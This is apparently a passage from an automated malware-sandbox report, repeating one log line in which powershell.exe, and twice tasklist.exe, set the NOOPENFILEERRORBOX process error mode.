              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
